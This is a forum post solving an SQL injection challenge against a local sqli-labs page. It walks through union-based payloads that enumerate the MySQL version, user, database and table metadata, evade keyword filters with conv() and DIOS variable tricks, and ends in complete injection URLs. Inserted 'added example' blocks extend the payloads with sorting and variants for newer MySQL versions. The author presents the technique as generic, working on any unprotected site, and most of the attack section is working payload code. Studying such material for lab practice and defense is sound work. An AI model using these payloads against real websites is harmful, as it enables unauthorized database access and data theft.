KashmiriWOlf Challenge 2 Solution
Salam guys. I was getting too many requests about closing my challenges (about advanced SQLi). Some guys said "Don't share your knowledge like this, it will get lamed." But I am one of the greatest lamers ever, and Master Ajkaro is my inspiration.
He used to share his knowledge and people used to learn from it (at least 0.00001% did, including me).
So I thought "sharing won't decrease my knowledge", so I am going to post solutions to some of my challenges.
Let's start with Challenge No. 2.
Here is the link to this challenge:
http://forum.sqliwiki.com/showthread.php?tid=4832
I will use Master Ajkaro's style to explain things. There are 4 tasks:
A. Print name with version
B. User (must be like the pic) and DB
C. Print tables starting with 'u' and not containing any 'a' in them, from the primary database (also tell how many such tables exist)
D. Print records and data in tables and sort them in descending order if there is more than 1 (according to records)
Rules are:
For the first task, don't use any char, hex, binary, base64(), ascii or quotes (for printing the name), and don't use @@version, version(), @@GLOBAL.VERSION or @@VERSION_COMMENT (for printing the version).
General rules: don't use lpad, rpad, group_concat, no underscored (_) concatenating functions, no variables, replace() not more than once, no nested functions for DIOS, no repeat, insert, lpad, rpad, find_in_set, aes_decrypt/encrypt, len().
You can't use concat more than 3 times.
Use DIOS.
Your solution should be generic (it should work on every site where such tables exist, WAFed sites excluded).
Your injection should work without knowing anything about the databases/tables.
First we will just complete the tasks.
Let's start.
We have to concatenate the 4 tasks (A, B, C, D):
Our query will be like: concat(A,B,C,D)
Let's look at them separately.
Part A:
Print name with version. I will use localhost here.
Code:
Concat
(
'Kashmiri :: ',version()
)
And Here IT is :
localhost/sqli/?id=1 union select 1,concat('Kashmiri :: ',version()),3,4,5
OK, now check the rules.
For the first task:
1. For the first task don't use any char, hex, binary, base64(), ascii, quotes ~~> for printing your name
That means for printing the name we can't use any of the above.
But keep in mind there is another rule: "Your solution should be generic (it should work on every site where such tables exist, WAFed sites excluded)."
That means your code should work on other sites too. We will use a mathematical function here:
conv(N, from_base, to_base)
Reference (https://dev.mysql.com/): Converts numbers between different number bases. Returns a string representation of the number N, converted from base from_base to base to_base. Returns NULL if any argument is NULL. The argument N is interpreted as an integer, but may be specified as an integer or a string. The minimum base is 2 and the maximum base is 36. If from_base is a negative number, N is regarded as a signed number. Otherwise, N is treated as unsigned. CONV() works with 64-bit precision.
Code:
concat
(
conv(N,10,32), conv(N,10,32), ... and so on
)
Base 32 uses the digits 0-9 followed by the letters A-V, so conv(10+n,10,32) gives the n-th letter of the alphabet (10 -> A, 20 -> K, 28 -> S). conv() always returns uppercase, which is why every letter except the first is wrapped in lower() below. Base 32 stops at V (31); a name containing W-Z needs base 36, where conv(35,10,36) is Z. A digit is simply conv(d,10,10), or d itself.
So our query will be like:
localhost/sqli/?id=1' and false union select 1,concat(conv(20,10,32),lower(conv(10,10,32)),lower(conv(28,10,32)),lower(conv(17,10,32)),lower(conv(22,10,32)),lower(conv(18,10,32)),lower(conv(27,10,32)),lower(conv(18,10,32))),3,4,5
Proof ~~>
http://imgur.com/a/HG13S
2. [@@version, version(), @@GLOBAL.VERSION, @@VERSION_COMMENT] ~~> for printing the version
We know there are two tables in MySQL's information_schema:
global_variables
session_variables
and one that is very rare (a MariaDB table):
system_variables
We all know the first has two columns:
variable_name
variable_value
If we dump these columns from these tables, they contain a lot of useful info, including the version, so we will print the version from this table.
Code:
(select concat(variable_name,' :: ',variable_value)
 from information_schema.global_variables
 where variable_name sounds like '%version%')
Or
(select concat(variable_name,' :: ',variable_value)
 from information_schema.session_variables
 where variable_name sounds like '%version%')
SOUNDS LIKE compares SOUNDEX() codes, and SOUNDEX() ignores the % signs, so this matches only the VERSION row and the subquery stays single-row (plain LIKE '%version%' would also match VERSION_COMMENT, INNODB_VERSION and friends, and a multi-row scalar subquery is an error).
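Where these tables live differs by server, so a generic payload has to pick the right one. As an added example (not from the original post), the queries below read the version from the tables the post uses and from their replacement, and the last one shows why SOUNDS LIKE leaves exactly one row. information_schema.global_variables and session_variables exist in MySQL 5.5/5.6 and in MariaDB; MySQL 5.7 deprecated them (they are only visible with show_compatibility_56=ON) and MySQL 8.0 removed them, the same two columns now living in performance_schema.global_variables and session_variables.

```sql
-- Added example, not from the original post. Three reads of the server
-- version that avoid @@version / version(), chosen by server family.

-- MySQL 5.5 / 5.6 and MariaDB: the table the post uses.
select concat(variable_name, ' :: ', variable_value)
  from information_schema.global_variables
 where variable_name sounds like '%version%';

-- MySQL 5.7 (show_compatibility_56=OFF) and MySQL 8.0: same two columns,
-- moved to performance_schema; information_schema.global_variables is gone.
select concat(variable_name, ' :: ', variable_value)
  from performance_schema.global_variables
 where variable_name sounds like '%version%';

-- Why SOUNDS LIKE returns one row: list every name plain LIKE would match
-- next to its SOUNDEX() code and the code of the pattern. Only VERSION gets
-- V625; the longer names keep extra digits because MySQL's SOUNDEX() is not
-- truncated to four characters, so they do not collide with the pattern.
select variable_name, soundex(variable_name), soundex('%version%')
  from information_schema.global_variables
 where variable_name like '%version%';
```

On a target where the union fails with "Subquery returns more than 1 row", the third query run locally against the same server version shows which names collide; on MySQL 8.0 swap information_schema for performance_schema in all three.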
Let's concatenate these two parts, 1 and 2:
concat(1,2)
Code:
localhost/sqli/?id=1' and false union select 1,concat(conv(20,10,32),lower(conv(10,10,32)),lower(conv(28,10,32)),lower(conv(17,10,32)),lower(conv(22,10,32)),lower(conv(18,10,32)),lower(conv(27,10,32)),lower(conv(18,10,32)),'
',(select
concat
(variable_name,' :: ',variable_value)
from information_schema.global_variables
where variable_name sounds
like '%version%'
)),3,4,5
Proof ~~> http://imgur.com/a/dI4cO
I used lower() here to print the letters in lowercase:
lower(string)
Part A is completed with all rules followed.
Part B:
User (must be like my PoC) and DB
The user is usually root@localhost.
Here the task was to print an asterisk (*) instead of @.
Let's print the user as in the PoC.
We will use the replace() function here:
replace(string, substring_to_replace, replacement)
Example:
Code:
replace
(
0x24,0x24,'Kashmiri'
)
(0x24 is '$', so this replaces the only character of the string '$' with 'Kashmiri'.)
For User :
Code:
replace
(
user(),'@','*'
)
The final code will be:
localhost/sqli/?id=1' and false union select 1,concat(conv(20,10,32),lower(conv(10,10,32)),lower(conv(28,10,32)),lower(conv(17,10,32)),lower(conv(22,10,32)),lower(conv(18,10,32)),lower(conv(27,10,32)),lower(conv(18,10,32)),'
',(select concat (variable_name,' :: ',variable_value) from information_schema.global_variables where variable_name like '%version%' limit 1,1),'
',replace
(
user(),'@','*'
),'
',database()),3,4,5
Proof ~~> http://imgur.com/a/V6WQ4
Part B is completed. (This version of the query selects the version with like '%version%' limit 1,1, i.e. the second matching row in whatever order the server happens to return them; the final queries in Parts C and D use sounds like instead, which matches only the VERSION row.)
Let's move to Part C.
Part C:
Print tables starting with 'u' and not containing any 'a' in them, from the primary database (also tell how many such tables exist)
We will use searching here (Ajkaro's phrase ^_^).
For "how many such tables exist" we will use count() first.
Code :
(select
count(*) from information_schema.tables where table_schema=database() and table_name like 'u%' and table_name not like '%a%'
)
Now, printing them (for this we will use DIOS). The @x:=concat(@x,table_name) assignment sits in the WHERE clause, so it runs for every matching row, but it is never true as a condition (the string starts with the NUL byte @x was initialised to, which converts to 0), so the inner subquery returns no rows while @x collects all the names, and the outer select(@x) reads the result.
Code:
(Select(@x)from(select(@x:=0x00),(select(@x)from(information_schema.tables)where(table_schema=database())and(table_name like 'u%')and table_name not like '%a%' and@x:=concat(@x,table_name)))x)
Our Final Query WIll Be :
Code :
http://localhost/sqli-labs-master/Less-1/?id=1' and false union select 1,concat(conv(20,10,32),lower(conv(10,10,32)),lower(conv(28,10,32)),lower(conv(17,10,32)),lower(conv(22,10,32)),lower(conv(18,10,32)),lower(conv(27,10,32)),lower(conv(18,10,32)),'
',(select concat (variable_name,' :: ',variable_value) from information_schema.global_variables where variable_name sounds like '%version%' ),'
',replace (user(),'@','*'),'
',database(),'
',(select count(*) from information_schema.tables where table_schema=database() and table_name like 'u%' and table_name not like '%a%' ),(Select(@x)from(select(@x:=0x00),(select(@x)from(information_schema.tables)where(table_schema=database())and(table_name like 'u%')and table_name not like '%a%' and@x:=concat(@x,'
',table_name)))x)),3-- -
Proof ~~> http://imgur.com/a/1Dnan
Part C is completed
Part D:
D. Print records and data in tables and sort them in descending order if there is more than 1 (according to records)
This is easy as hell.
Final query:
http://localhost/sqli-labs-master/Less-1/?id=1' and false union select 1,concat(conv(20,10,32),lower(conv(10,10,32)),lower(conv(28,10,32)),lower(conv(17,10,32)),lower(conv(22,10,32)),lower(conv(18,10,32)),lower(conv(27,10,32)),lower(conv(18,10,32)),'
',(select concat (variable_name,' :: ',variable_value) from information_schema.global_variables where variable_name sounds like '%version%' ),'
',replace (user(),'@','*'),'
',database(),'
',(select count(*) from information_schema.tables where table_schema=database() and table_name like 'u%' and table_name not like '%a%' ),(Select(@x)from(select(@x:=0x00),(select(@x)from(information_schema.tables)where(table_schema=database())and(table_name like 'u%')and table_name not like '%a%' and@x:=concat(@x,'
',table_name,' :: ',table_rows,' :: ',data_length)))x)),3-- -
Proof ~~> http://imgur.com/a/c3tFv
I will explain sorting in the next session; here we had only one table, so I didn't sort them. Note that table_rows in information_schema.tables is an estimate for InnoDB tables, not an exact count.
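The sorted variant that Part D asks for, together with the Part C count, as an added example that is not from the original post. To order the DIOS output, information_schema.tables is wrapped in a derived table with ORDER BY table_rows DESC, so the rows are appended to @x in that order: in MySQL 5.6 the derived table is materialised in that order, and in 5.7/8.0 the optimizer keeps a derived table's ORDER BY when it is the only FROM source and the enclosing block has no grouping, DISTINCT or ORDER BY of its own, which is the case here. Two caveats: MySQL documents the evaluation order of expressions containing user variables as undefined (and := inside expressions is deprecated since 8.0.13), so DIOS works in practice rather than by guarantee, and table_rows is only an estimate for InnoDB. The Less-1 URL is the page's own; 0x0a is a newline, used where the post puts a literal newline inside quotes.

```sql
-- Added example, not from the original post. Part C count plus the Part D
-- DIOS sorted by row count (descending).

-- Part C: how many tables match. TABLE_NAME in information_schema is
-- case-insensitive (utf8_general_ci), so 'u%' also matches 'Users' and
-- '%a%' also excludes names containing 'A'.
select count(*)
  from information_schema.tables
 where table_schema = database()
   and table_name like 'u%'
   and table_name not like '%a%';

-- Part D: DIOS with ordering. @x starts as one NUL byte; the assignment in
-- the WHERE clause runs once per row of t, converts to 0 (false) so the inner
-- subquery yields no rows, and the outer select reads the accumulated string.
-- Derived table t supplies the rows already sorted, so they are appended in
-- descending table_rows order.
select (@x)
  from (
    select (@x := 0x00),
           (select (@x)
              from (select table_name, table_rows, data_length
                      from information_schema.tables
                     where table_schema = database()
                       and table_name like 'u%'
                       and table_name not like '%a%'
                     order by table_rows desc) t
             where @x := concat(@x, 0x0a, table_name, ' :: ', table_rows, ' :: ', data_length))
  ) x;

-- The same DIOS dropped into the post's union (three columns, string
-- context), written on one line as it would be sent:
-- http://localhost/sqli-labs-master/Less-1/?id=1' and false union select 1,
--   (select(@x)from(select(@x:=0x00),(select(@x)from(select table_name,table_rows,data_length
--   from information_schema.tables where table_schema=database() and table_name like 'u%'
--   and table_name not like '%a%' order by table_rows desc)t
--   where @x:=concat(@x,0x0a,table_name,' :: ',table_rows,' :: ',data_length)))x),3-- -
```

Run the two standalone statements in a MySQL client against a database that has more than one matching table to see the order change; in the union form the DIOS still counts as the third and last concat() of the full payload, so the challenge's concat limit is unchanged.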
Credits to ~~> Master Ajkaro, benzi, makman, khexan, rummy, cybrhckr
Regards
KASHMIRI_WOLF
FB link: Kashmiri_Wolf. Thanks to Sqli-Basic for letting me share this.